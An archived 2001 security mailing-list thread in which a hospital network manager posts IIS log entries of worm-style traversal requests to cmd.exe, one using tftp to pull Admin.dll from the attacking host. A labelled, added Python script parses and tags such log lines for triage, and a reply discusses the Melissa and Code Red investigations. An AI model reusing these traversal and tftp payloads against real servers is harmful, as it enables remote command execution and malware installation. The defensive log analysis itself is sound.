Re: [RE: Any leads?]

From: J.Michael Cuciti (mcuciti@private)
Date: Fri Sep 21 2001 - 13:43:36 PDT


    All:
    
    I still have a script trying to run, but the location and folder don't
    exist.  This is what I found in my log file:
    
    206.98.79.246, -, 9/18/01, 7:29:26, W3SVC, WWW, 206.98.124.52, 150, 151, 304,
    200, 0, GET, /scripts/..%2f../winnt/system32/cmd.exe,
    /c+tftp%20-i%20206.98.79.246%20GET%20Admin.dll%20c:\Admin.dll, 
    
    206.98.79.246, -, 9/18/01, 7:29:27, W3SVC, WWW, 206.98.124.52, 180, 151, 304,
    200, 0, GET, /scripts/..%2f../winnt/system32/cmd.exe,
    /c+tftp%20-i%20206.98.79.246%20GET%20Admin.dll%20d:\Admin.dll, 
    
    206.252.224.50, -, 9/18/01, 7:29:33, W3SVC, WWW, 206.98.124.52, 10, 72, 273,
    403, 5, GET, /scripts/root.exe, /c+dir, 
    
    206.252.224.50, -, 9/18/01, 7:29:38, W3SVC, WWW, 206.98.124.52, 80, 96, 1652,
    200, 0, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir, 
    
    208.238.181.162, -, 9/18/01, 7:29:46, W3SVC, WWW, 206.98.124.52, 10, 97, 243,
    500, 123, GET, /scripts/..Á../winnt/system32/cmd.exe, /c+dir, 
    
    If anybody knows what this is, please 'spain it to me.
    
    I am running IIS 3.0, NT4.0 w/sp3 (haven't upgraded, I inherited this, not my
    fault :-) )
    
    In the event log I see this same type of message running every few minutes. 
    The script is supposedly running from
    \winnt\iisadmin\Scripts\..%5c..\admin.dll.  This does not exist.
    
    Thanks...
    
    Mike Cuciti
    Network Service and Support Manager
    Tuality Healthcare
    681.1749
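    The log excerpt above is what a traversal attempt against cmd.exe looks like
    in the IIS log format, and the status column is what tells you whether the
    server actually served the request (200) or refused it (403/500). The
    script below is an added example, not code from this thread or from any
    of its posters: it parses records in the 15-field Microsoft IIS log
    layout (which the posted lines are assumed to follow), percent-decodes the
    target path, and tags the traversal / cmd.exe / root.exe / tftp markers so
    the lines worth escalating stand out. The sample records are constructed
    to mirror the posted ones, with one benign request added for contrast.

```python
"""Triage IIS log records for traversal / cmd.exe / tftp patterns.

Added example (not part of the original mailing-list thread).  The field
layout is assumed to be the 15-field Microsoft IIS log format; the sample
lines are constructed to mirror the log excerpt in the post above.
"""
import re
from urllib.parse import unquote

# Assumed field order of the Microsoft IIS log format (15 fields).
FIELDS = ("client_ip", "user", "date", "time", "service", "server",
          "server_ip", "time_taken", "bytes_recv", "bytes_sent",
          "status", "win32_status", "method", "stem", "query")

# Constructed sample records shaped like the posted log excerpt.
SAMPLE_LOG = r"""
206.98.79.246, -, 9/18/01, 7:29:26, W3SVC, WWW, 206.98.124.52, 150, 151, 304, 200, 0, GET, /scripts/..%2f../winnt/system32/cmd.exe, /c+tftp%20-i%20206.98.79.246%20GET%20Admin.dll%20c:\Admin.dll,
206.252.224.50, -, 9/18/01, 7:29:33, W3SVC, WWW, 206.98.124.52, 10, 72, 273, 403, 5, GET, /scripts/root.exe, /c+dir,
206.252.224.50, -, 9/18/01, 7:29:38, W3SVC, WWW, 206.98.124.52, 80, 96, 1652, 200, 0, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
208.238.181.162, -, 9/18/01, 7:29:46, W3SVC, WWW, 206.98.124.52, 10, 97, 243, 500, 123, GET, /scripts/..Á../winnt/system32/cmd.exe, /c+dir,
10.0.0.7, -, 9/18/01, 7:30:01, W3SVC, WWW, 206.98.124.52, 5, 60, 900, 200, 0, GET, /default.htm, -,
""".strip("\n")

SHELL_EXEC = re.compile(r"/(cmd|root)\.exe$", re.IGNORECASE)
TFTP = re.compile(r"\btftp\b", re.IGNORECASE)


def parse_line(line):
    """Split one IIS log record into a dict, or return None if malformed.

    The format has no quoting, so we split on the first 14 commas and let
    the parameters field keep the remainder (minus the trailing comma).
    """
    parts = line.split(",", 14)
    if len(parts) < 15:
        return None
    rec = dict(zip(FIELDS, (p.strip() for p in parts)))
    rec["query"] = rec["query"].rstrip(",").strip()
    return rec


def decode_path(stem):
    """Percent-decode until stable (handles double encoding) and fold
    backslashes to slashes so '..%5c..' and '..%2f..' look alike."""
    prev, cur = None, stem
    while cur != prev:
        prev, cur = cur, unquote(cur)
    return cur.replace("\\", "/")


def classify(rec):
    """Return the list of indicator tags that apply to one record."""
    tags = []
    path = decode_path(rec["stem"])
    params = unquote(rec["query"]).replace("+", " ")
    if ".." in path:                       # any parent-dir segment in a URL stem
        tags.append("traversal")
    if any(ord(ch) > 127 for ch in rec["stem"]):
        tags.append("non-ascii-in-path")   # the 'Á' variant seen in the post
    if SHELL_EXEC.search(path):
        tags.append("shell-exec")          # cmd.exe / root.exe as the target
    if TFTP.search(params):
        tags.append("tftp-transfer")       # file fetched onto the server
    if tags and rec["status"] == "200":
        tags.append("SERVED-200")          # IIS answered it, not refused it
    return tags


def triage(text):
    """Map 1-based line number -> tags for every record that raised a tag."""
    hits = {}
    for n, line in enumerate(text.splitlines(), 1):
        rec = parse_line(line)
        if rec is None:
            continue
        tags = classify(rec)
        if tags:
            hits[n] = tags
    return hits


def first_seen(text):
    """Earliest tagged request per source address: 'date time' strings."""
    seen = {}
    for line in text.splitlines():
        rec = parse_line(line)
        if rec and classify(rec) and rec["client_ip"] not in seen:
            seen[rec["client_ip"]] = f"{rec['date']} {rec['time']}"
    return seen


if __name__ == "__main__":
    for n, tags in triage(SAMPLE_LOG).items():
        print(f"line {n}: {', '.join(tags)}")
    for ip, when in first_seen(SAMPLE_LOG).items():
        print(f"first tagged request from {ip}: {when}")
```

    The SERVED-200 tag is the one to act on: a 200 on a cmd.exe request
    means the command line in the parameters field ran, whereas the 403 and
    500 records show requests the server turned away.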
    
    
    "Kuo, Jimmy" <Jimmy_Kuo@private> wrote:
    >The Melissa author was caught because he posted the infectious document 
    >from his own AOL account to a news group, rather than releasing it 
    >through a hacked account. His guilt was confirmed when the serial number 
    >in the document matched the PC in the dumpster outside his bedroom :-)
    
    No.  He used a hacked acct.  But we identified the exact time of the use of
    the acct (newsgroup posting message ID) and the FBI traced the phone
    records.
    
    And the PC was destroyed and never located.
    
    Where did you get your version of the story?
    
    >But Code Red and its derivatives is not an Office document, and 
    >therefore has no serial numbers. That investigators appear to have no 
    >leads months after Code Red appeared tells me that it was likely 
    >released to the wild from a compromised machine, or perhaps 
    >simultaneously released from multiple compromised machines. If the 
    >author(s) were good, then those compromised machines were initially 
    >attacked from other compromised machines. Likely all of these initial 
    >release vector machines have long since been wiped and re-installed, and 
    >the links to the author(s) have been cut.
    
    We have some "first instances" of traffic.  I don't know what the FBI's
    doing with the information gathered so far.  But I agree that it's difficult
    and not likely.
    
    Jimmy
    



    This archive was generated by hypermail 2b30 : Sun May 26 2002 - 11:25:38 PDT